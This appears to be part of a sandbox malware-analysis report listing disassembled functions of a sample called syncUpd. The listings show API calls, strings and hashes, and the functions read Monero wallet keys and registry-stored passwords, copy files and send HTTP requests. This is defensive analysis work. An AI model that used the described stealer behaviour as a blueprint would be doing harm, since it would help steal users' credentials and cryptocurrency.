                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_8f0000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: lstrcat$Local$AllocFile$Freememset$BinaryCryptGlobalStringmemcmp$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 1812951797-0
                                                                                                                                                                                                                                                              • Opcode ID: 3981b85e59352d7def05d6fd474150d6dc12845fb4d5c879c5cf0e4b84f5d486
                                                                                                                                                                                                                                                              • Instruction ID: e1b5b34ea332bdb2b30b885a5c5905617461582495aa3050047f943bd3924e28
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3981b85e59352d7def05d6fd474150d6dc12845fb4d5c879c5cf0e4b84f5d486
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 367133B2900618BFCB24EBA4DC89FEE7779AF88700F044598F60597181DB759B54CFA1
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 004012D0 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 139stringfileCOMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • memset.MSVCRT ref: 004012E7
                                                                                                                                                                                                                                                                • Part of subcall function 00401260: GetProcessHeap.KERNEL32(00000000,00000104,80000001), ref: 00401274
                                                                                                                                                                                                                                                                • Part of subcall function 00401260: HeapAlloc.KERNEL32(00000000), ref: 0040127B
                                                                                                                                                                                                                                                                • Part of subcall function 00401260: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 00401297
                                                                                                                                                                                                                                                                • Part of subcall function 00401260: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,000000FF,000000FF), ref: 004012B5
                                                                                                                                                                                                                                                                • Part of subcall function 00401260: RegCloseKey.ADVAPI32(?), ref: 004012BF
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,00000000), ref: 0040130F
                                                                                                                                                                                                                                                              • lstrlen.KERNEL32(?), ref: 0040131C
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,.keys), ref: 00401337
                                                                                                                                                                                                                                                                • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
                                                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
                                                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012
                                                                                                                                                                                                                                                                • Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05
                                                                                                                                                                                                                                                                • Part of subcall function 00415260: GetSystemTime.KERNEL32(?,0095FF10,0041D129,?,?,?,?,?,?,?,?,?,00404623,?,00000014), ref: 00415286
                                                                                                                                                                                                                                                                • Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
                                                                                                                                                                                                                                                                • Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82
                                                                                                                                                                                                                                                              • CopyFileA.KERNEL32(?,00000000,00000001), ref: 00401425
                                                                                                                                                                                                                                                                • Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6
                                                                                                                                                                                                                                                                • Part of subcall function 004093A0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004093CC
                                                                                                                                                                                                                                                                • Part of subcall function 004093A0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 004093F1
                                                                                                                                                                                                                                                                • Part of subcall function 004093A0: LocalAlloc.KERNEL32(00000040,?), ref: 00409411
                                                                                                                                                                                                                                                                • Part of subcall function 004093A0: ReadFile.KERNEL32(000000FF,?,00000000,'@,00000000), ref: 0040943A
                                                                                                                                                                                                                                                                • Part of subcall function 004093A0: LocalFree.KERNEL32('@), ref: 00409470
                                                                                                                                                                                                                                                                • Part of subcall function 004093A0: CloseHandle.KERNEL32(000000FF), ref: 0040947A
                                                                                                                                                                                                                                                              • DeleteFileA.KERNEL32(00000000), ref: 004014A9
                                                                                                                                                                                                                                                              • memset.MSVCRT ref: 004014D0
                                                                                                                                                                                                                                                                • Part of subcall function 00404DC0: lstrlen.KERNEL32(00000000), ref: 00404E4A
                                                                                                                                                                                                                                                                • Part of subcall function 00404DC0: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404EBB
                                                                                                                                                                                                                                                                • Part of subcall function 00404DC0: StrCmpCA.SHLWAPI(?,0095DC90), ref: 00404ED9
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2757736487.0000000000400000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000431000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000435000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000439000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000444000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000636000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_400000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Filelstrcpy$lstrcat$lstrlen$AllocCloseHeapLocalOpenmemset$CopyCreateDeleteFreeHandleInternetProcessQueryReadSizeSystemTimeValue
                                                                                                                                                                                                                                                              • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                                                                                                                                                                                                                                                              • API String ID: 330749937-218353709
                                                                                                                                                                                                                                                              • Opcode ID: 305962daf2602191b7e2f382e09e65ef34577e4f9fb4e706ccba5eb953d9931d
                                                                                                                                                                                                                                                              • Instruction ID: 465d6e3be360dc7981781b6de12631b9db2cd28431e3bfe2701297f35846b4c8
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 305962daf2602191b7e2f382e09e65ef34577e4f9fb4e706ccba5eb953d9931d
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: DD5123B195021897CB15EB61DD92BED773D9F54304F4041EDB60A62091DE385BC5CFA8
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 00406FA0 Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 91stringCOMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                • Part of subcall function 00406CA0: memset.MSVCRT ref: 00406CE4
                                                                                                                                                                                                                                                                • Part of subcall function 00406CA0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00406D0A
                                                                                                                                                                                                                                                                • Part of subcall function 00406CA0: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00406D81
                                                                                                                                                                                                                                                                • Part of subcall function 00406CA0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 00406DDD
                                                                                                                                                                                                                                                                • Part of subcall function 00406CA0: GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,`v@,80000001,h0A,?,?,?,?,?,00407660,?), ref: 00406E22
                                                                                                                                                                                                                                                                • Part of subcall function 00406CA0: HeapFree.KERNEL32(00000000,?,?,?,?,`v@,80000001,h0A,?,?,?,?,?,00407660,?), ref: 00406E29
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(00000000,0041DEB8), ref: 00406FD6
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(00000000,00000000), ref: 00407018
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(00000000, : ), ref: 0040702A
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(00000000,00000000), ref: 0040705F
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(00000000,0041DEC0), ref: 00407070
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(00000000,00000000), ref: 004070A3
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(00000000,0041DEC4), ref: 004070BD
                                                                                                                                                                                                                                                              • task.LIBCPMTD ref: 004070CB
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2757736487.0000000000400000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000431000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000435000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000439000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000444000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000636000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_400000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: lstrcat$Heap$EnumFreeOpenProcessValuememsettask
                                                                                                                                                                                                                                                              • String ID: : $`v@$h0A
                                                                                                                                                                                                                                                              • API String ID: 3191641157-3559972273
                                                                                                                                                                                                                                                              • Opcode ID: a80821301df9fc98fc2fea46b77aea938f25e64f1e98b9be3b3876524ebf38a9
                                                                                                                                                                                                                                                              • Instruction ID: d9fe8ddf8edd41d5d79e2c2aa3549d60ad86c8a123fe42dd1537da3b5299582f
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a80821301df9fc98fc2fea46b77aea938f25e64f1e98b9be3b3876524ebf38a9
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4B318371E05504ABCB14EBA0DD99EFF7B75BF44305B104519F102BB290DA38BD46CB99
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 00415710 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 184COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2757736487.0000000000400000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000431000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000435000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000439000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000444000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000636000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_400000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: image/jpeg
                                                                                                                                                                                                                                                              • API String ID: 0-3785015651
                                                                                                                                                                                                                                                              • Opcode ID: f49c1257dc185d8d1ff095b11ccc5862cd9d4f3fd77aecdbcfb3a1e41bc60b00
                                                                                                                                                                                                                                                              • Instruction ID: 4e1e11a2c406ea1305e74ab4ef0d66e5904d243d4ada77d8c1e4b1ca7303bf9d
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f49c1257dc185d8d1ff095b11ccc5862cd9d4f3fd77aecdbcfb3a1e41bc60b00
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 30714CB5910608EBDB14EFE4EC85FEEB7B9BF48300F108509F515A7290DB38A945CB64
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 008F47A7 Relevance: 17.0, APIs: 11, Instructions: 479networkstringfileCOMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                • Part of subcall function 00907007: lstrcpy.KERNEL32(?,00000000), ref: 0090704D
                                                                                                                                                                                                                                                                • Part of subcall function 008F46D7: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 008F475D
                                                                                                                                                                                                                                                                • Part of subcall function 008F46D7: InternetCrackUrlA.WININET(00000000,00000000), ref: 008F476D
                                                                                                                                                                                                                                                                • Part of subcall function 00906FA7: lstrcpy.KERNEL32(0041D7D6,00000000), ref: 00906FEF
                                                                                                                                                                                                                                                              • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 008F483C
                                                                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,00624C68), ref: 008F4861
                                                                                                                                                                                                                                                              • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 008F49E1
                                                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,0041D797,00000000,?,?,00000000,?,0041E044,00000000,?,00624CF4), ref: 008F4D0F
                                                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 008F4D2B
                                                                                                                                                                                                                                                              • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 008F4D3F
                                                                                                                                                                                                                                                              • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 008F4D70
                                                                                                                                                                                                                                                              • InternetCloseHandle.WININET(00000000), ref: 008F4DD4
                                                                                                                                                                                                                                                              • InternetCloseHandle.WININET(00000000), ref: 008F4DEC
                                                                                                                                                                                                                                                              • HttpOpenRequestA.WININET(00000000,00624C84,?,00624AB0,00000000,00000000,00400100,00000000), ref: 008F4A3C
                                                                                                                                                                                                                                                                • Part of subcall function 00907217: lstrlen.KERNEL32(?,006249EC,?,004215A4,0041D7D6), ref: 0090722C
                                                                                                                                                                                                                                                                • Part of subcall function 00907217: lstrcpy.KERNEL32(00000000), ref: 0090726B
                                                                                                                                                                                                                                                                • Part of subcall function 00907217: lstrcat.KERNEL32(00000000,00000000), ref: 00907279
                                                                                                                                                                                                                                                                • Part of subcall function 00907107: lstrcpy.KERNEL32(?,0041D7D6), ref: 0090716C
                                                                                                                                                                                                                                                                • Part of subcall function 00907187: lstrcpy.KERNEL32(00000000,?), ref: 009071D9
                                                                                                                                                                                                                                                                • Part of subcall function 00907187: lstrcat.KERNEL32(00000000), ref: 009071E9
                                                                                                                                                                                                                                                              • InternetCloseHandle.WININET(00000000), ref: 008F4DF6
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2758122594.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_8f0000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 460715078-0
                                                                                                                                                                                                                                                              • Opcode ID: 186e0976d42a377170bf95904968b890918cbcfc74f47cf10a8b65478b08e6f4
                                                                                                                                                                                                                                                              • Instruction ID: 508f4f6a7b5e4a2659645d88d9b848ccaf4e40d9f821f64246bbe295258277c5
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 186e0976d42a377170bf95904968b890918cbcfc74f47cf10a8b65478b08e6f4
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B412B876D04218AECB15EBA0DDA2FEEB779AF94714F104199B106A21D1EF703F48CB51
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 008FF972 Relevance: 15.2, APIs: 10, Instructions: 205stringCOMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • lstrcpy.KERNEL32(?,?), ref: 008FF9A2
                                                                                                                                                                                                                                                                • Part of subcall function 00905747: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00905772
                                                                                                                                                                                                                                                                • Part of subcall function 00905BC7: StrStrA.SHLWAPI(?,?), ref: 00905BD3
                                                                                                                                                                                                                                                              • lstrcpy.KERNEL32(?,00000000), ref: 008FF9DE
                                                                                                                                                                                                                                                                • Part of subcall function 00905BC7: lstrcpyn.KERNEL32(00625310,?,?), ref: 00905BF7
                                                                                                                                                                                                                                                                • Part of subcall function 00905BC7: lstrlen.KERNEL32(?), ref: 00905C0E
                                                                                                                                                                                                                                                                • Part of subcall function 00905BC7: wsprintfA.USER32 ref: 00905C2E
                                                                                                                                                                                                                                                              • lstrcpy.KERNEL32(?,00000000), ref: 008FFA26
                                                                                                                                                                                                                                                              • lstrcpy.KERNEL32(?,00000000), ref: 008FFA6E
                                                                                                                                                                                                                                                              • lstrcpy.KERNEL32(?,00000000), ref: 008FFAB5
                                                                                                                                                                                                                                                              • lstrcpy.KERNEL32(?,00000000), ref: 008FFAFD
                                                                                                                                                                                                                                                              • lstrcpy.KERNEL32(?,00000000), ref: 008FFB45
                                                                                                                                                                                                                                                              • lstrcpy.KERNEL32(?,00000000), ref: 008FFB8C
                                                                                                                                                                                                                                                              • lstrcpy.KERNEL32(?,00000000), ref: 008FFBD4
                                                                                                                                                                                                                                                                • Part of subcall function 00907087: lstrlen.KERNEL32(008F4E2C,?,?,008F4E2C,0041D79A), ref: 00907092
                                                                                                                                                                                                                                                                • Part of subcall function 00907087: lstrcpy.KERNEL32(0041D79A,00000000), ref: 009070EC
                                                                                                                                                                                                                                                              • strtok_s.MSVCRT ref: 008FFCF6
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2758122594.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_8f0000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: lstrcpy$lstrlen$FolderPathlstrcpynstrtok_swsprintf
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 4276352425-0
                                                                                                                                                                                                                                                              • Opcode ID: e6a7c0ac9f1fb61494969f18be3aa34b02d47fee828f2ee4e8056f5644afee52
                                                                                                                                                                                                                                                              • Instruction ID: f82602e09ac5d4278de24d1f6feedb0d4134dc9c1c86e6754e40c0923358895e
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e6a7c0ac9f1fb61494969f18be3aa34b02d47fee828f2ee4e8056f5644afee52
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 757157B1D006199FCB24EBA0DC89FEE7779AF94301F044598F109A3191EF71AA899F60
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 00406CA0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 149registrymemoryCOMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • memset.MSVCRT ref: 00406CE4
                                                                                                                                                                                                                                                              • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00406D0A
                                                                                                                                                                                                                                                              • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00406D81
                                                                                                                                                                                                                                                              • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 00406DDD
                                                                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,`v@,80000001,h0A,?,?,?,?,?,00407660,?), ref: 00406E22
                                                                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000,?,?,?,?,`v@,80000001,h0A,?,?,?,?,?,00407660,?), ref: 00406E29
                                                                                                                                                                                                                                                                • Part of subcall function 00408C20: vsprintf_s.MSVCRT ref: 00408C3B
                                                                                                                                                                                                                                                              • task.LIBCPMTD ref: 00406F25
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2757736487.0000000000400000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000431000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000435000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000439000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000444000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000636000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_400000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Heap$EnumFreeOpenProcessValuememsettaskvsprintf_s
                                                                                                                                                                                                                                                              • String ID: Password
                                                                                                                                                                                                                                                              • API String ID: 2698061284-3434357891
                                                                                                                                                                                                                                                              • Opcode ID: e5b433d59e683e3853dabaec4553a197e9f76ed1b5df22dde85a26ca8bf12c56
                                                                                                                                                                                                                                                              • Instruction ID: 212e66a44237aadac39c144ffd634e87161c2b2b5cb707631054264fe3c499ea
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e5b433d59e683e3853dabaec4553a197e9f76ed1b5df22dde85a26ca8bf12c56
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4F613FB5D042589BDB24DB50CC45BDAB7B8BF44304F0081EAE64AA6281DF746FC9CF95
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 00904427 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 89memoryCOMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00904446
                                                                                                                                                                                                                                                              • GetVolumeInformationA.KERNEL32(00624DC0,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00904483
                                                                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00904507
                                                                                                                                                                                                                                                              • RtlAllocateHeap.NTDLL(00000000), ref: 0090450E
                                                                                                                                                                                                                                                              • wsprintfA.USER32 ref: 00904544
                                                                                                                                                                                                                                                                • Part of subcall function 00906FA7: lstrcpy.KERNEL32(0041D7D6,00000000), ref: 00906FEF
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2758122594.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_8f0000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                                                                                                                                                                                                                                                              • String ID: :$C$\
                                                                                                                                                                                                                                                              • API String ID: 1544550907-3809124531
                                                                                                                                                                                                                                                              • Opcode ID: 6ca11245975395cfb749b767d31339a8af53aa26318921bdecc0eb4ed934f432
                                                                                                                                                                                                                                                              • Instruction ID: e4a1816fe5cfdd1ee86dab96ed58173de565a92168727f62028c72807c246ec1
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6ca11245975395cfb749b767d31339a8af53aa26318921bdecc0eb4ed934f432
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E13170B0D042489FDF20DBA4DC45FEE7BB8AF48704F044098E649A72C1DB75AA94CF95
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 004093A0 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 82filememoryCOMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004093CC
                                                                                                                                                                                                                                                              • GetFileSizeEx.KERNEL32(000000FF,?), ref: 004093F1
                                                                                                                                                                                                                                                              • LocalAlloc.KERNEL32(00000040,?), ref: 00409411
                                                                                                                                                                                                                                                              • ReadFile.KERNEL32(000000FF,?,00000000,'@,00000000), ref: 0040943A
                                                                                                                                                                                                                                                              • LocalFree.KERNEL32('@), ref: 00409470
                                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(000000FF), ref: 0040947A
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2757736487.0000000000400000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000431000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000435000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000439000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000444000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000636000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_400000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                                                                                                                                                                                                                                                              • String ID: '@$'@
                                                                                                                                                                                                                                                              • API String ID: 2311089104-345573653
                                                                                                                                                                                                                                                              • Opcode ID: 3cc79ba795380566e913a09732aeafe9c6e20b9f9f284254c42bf9d3b4db8e1b
                                                                                                                                                                                                                                                              • Instruction ID: e17ca2bf8fb39da35cf654cfb04ed30359ebe63801e33f8f777122e55a65d6c5
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3cc79ba795380566e913a09732aeafe9c6e20b9f9f284254c42bf9d3b4db8e1b
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0B31EA74A00209EFDB24DF94C885BAEB7B5BF48314F108169E915A73D0D778AD42CFA5
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 00908AAA Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 47COMMONLIBRARYCODE
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • __getptd.LIBCMT ref: 00908AB6
                                                                                                                                                                                                                                                                • Part of subcall function 00907D93: __getptd_noexit.LIBCMT ref: 00907D96
                                                                                                                                                                                                                                                                • Part of subcall function 00907D93: __amsg_exit.LIBCMT ref: 00907DA3
